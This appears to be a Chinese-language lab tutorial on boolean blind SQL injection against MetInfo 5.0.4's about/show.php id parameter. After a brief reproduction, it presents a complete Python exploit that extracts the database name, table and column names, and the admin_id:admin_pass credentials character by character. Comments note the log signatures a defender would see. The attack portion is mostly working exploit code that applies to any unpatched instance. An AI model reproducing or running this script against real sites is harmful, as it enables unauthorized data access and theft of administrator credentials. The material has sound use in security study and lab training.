布尔盲注
布尔盲注一般适用于页面没有回显字段、但页面对条件为真和为假两种情况返回不同内容的场景：利用 and、or 等关键字构造 SQL 语句，再根据页面返回的真或假判断所构造的条件是否成立，从而逐步获取信息。
漏洞复现
漏洞注入点位于“联系我们”页面的 URL 参数中
利用 and 1=1 与 and 1=2 两种条件下页面返回的差异，判断出存在布尔盲注
利用 length 函数判断出数据库名长度为 11
exp编写
# metinfo_504_sqli.py
import requests
import string
# Boolean-based blind SQL injection PoC against a lab MetInfo 5.0.4 instance
# (the `id` parameter of about/show.php). Every probe is a plain GET whose
# query string ends in an injected ` and <condition> --+`; the page itself is
# the oracle: `flag` (a phone number rendered on the page) is present only
# when the injected condition is true. Nothing here is parallelised, paced or
# randomised, so from the defender's side a run looks like a burst of
# near-identical requests to one URL that differ only in the appended
# condition, and each condition will typically appear verbatim in the web
# server access log (query-string keywords such as `ascii(substr(`,
# `information_schema` and `length(database())` are the obvious signatures).
url = "http://192.168.66.29/metinfo_504/about/show.php?lang=cn&id=22"
headers = {
"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0"
}
flag = "13300000000" # phone number shown on the page; its presence in the response means the injected condition evaluated true
# Candidate characters tried for every position (printable ASCII minus the
# surrounding whitespace). NOTE: this rebinds the builtin name `str` for the
# rest of the script.
str =string.printable.strip()
# Step 1: length of the current database name (length(database())).
# Probes i = 0..19 and stops at the first true response.
print("--------------------------------------Attacking.....")
for i in range(20) :
payload = f" and length(database())={i} --+"
url_all = url + payload
# print(url_all)
res = requests.get(url = url_all , headers=headers)
if flag in res.text :
break
print(f"The database length is: {i}")
# Step 2: database name, one character per position (positions 1..11, matching
# the length found in the write-up). Each position costs up to len(str) requests;
# the inner loop stops at the first character whose ascii() comparison is true.
print("--------------------------------------Attacking.....")
dbs1 = ""
for i in range(1,12) :
for c in str :
payloads = f" and ascii(substr((select database()),{i},1))={ord(c)} --+"
url_all = url + payloads
# print(url_all)
res = requests.get(url=url_all,headers=headers)
if flag in res.text :
dbs1 += c
break
print(f"The db_name is: {dbs1}")
# Step 3: length of the comma-joined list of table names in the current
# database (group_concat over information_schema.tables).
print("--------------------------------------Attacking.....")
for i in range(1,500) :
payload = f""" and length((select group_concat(table_name) from information_schema.tables
where table_schema=database()))={i} --+"""
url_all = url + payload
# print(url_all)
res = requests.get(url = url_all , headers=headers)
if flag in res.text :
break
print(f"The table length is: {i}")
# Step 4: the table-name list itself, character by character (positions 1..332).
print("--------------------------------------Attacking.....")
dbs2 = ""
for i in range(1,333) :
for c in str :
payloads = f""" and ascii(substr((select group_concat(table_name) from information_schema.tables
where table_schema=database()),{i},1))={ord(c)} --+"""
url_all = url + payloads
# print(url_all)
res = requests.get(url=url_all,headers=headers)
if flag in res.text :
dbs2 += c
break
print(f"The tab_name is: {dbs2}")
# Step 5: length of the column-name list for one table. The table name is
# given as a hex literal (0x6d65745f61646d696e5f7461626c65 decodes to
# met_admin_table, the same table named in plain text in step 7) so that no
# quote characters are needed in the injected condition.
print("--------------------------------------Attacking.....")
for i in range(1,500) :
payload = f""" and length((select group_concat(column_name) from information_schema.columns
where table_schema=database() and table_name=0x6d65745f61646d696e5f7461626c65))={i} --+"""
url_all = url + payload
# print(url_all)
res = requests.get(url = url_all , headers=headers)
if flag in res.text :
break
print(f"The column length is: {i}")
# Step 6: the column-name list, character by character (positions 1..364).
print("--------------------------------------Attacking.....")
dbs3 = ""
for i in range(1,365) :
for c in str :
payloads = f""" and ascii(substr((select group_concat(column_name) from information_schema.columns
where table_schema=database() and table_name=0x6d65745f61646d696e5f7461626c65),{i},1))={ord(c)} --+"""
url_all = url + payloads
# print(url_all)
res = requests.get(url=url_all,headers=headers)
if flag in res.text :
dbs3 += c
break
print(f"The column_name is: {dbs3}")
# Step 7: length of the string admin_id:admin_pass from met_admin_table
# (0x3a is the ':' separator).
print("--------------------------------------Attacking.....")
for i in range(1,500) :
payload = f" and length((select concat(admin_id,0x3a,admin_pass) from met_admin_table))={i} --+"
url_all = url + payload
# print(url_all)
res = requests.get(url = url_all , headers=headers)
if flag in res.text :
break
print(f"The userpass length is: {i}")
# Step 8: the admin_id:admin_pass string, character by character (positions 1..38).
dbs4 = ""
print("--------------------------------------Attacking.....")
for i in range(1,39) :
for c in str :
payloads = f" and ascii(substr((select concat(admin_id,0x3a,admin_pass) from met_admin_table),{i},1))={ord(c)} --+"
url_all = url + payloads
res = requests.get(url= url_all,headers=headers)
if flag in res.text:
dbs4 += c
break
print(f"The userpass is: {dbs4}")
exp效果如下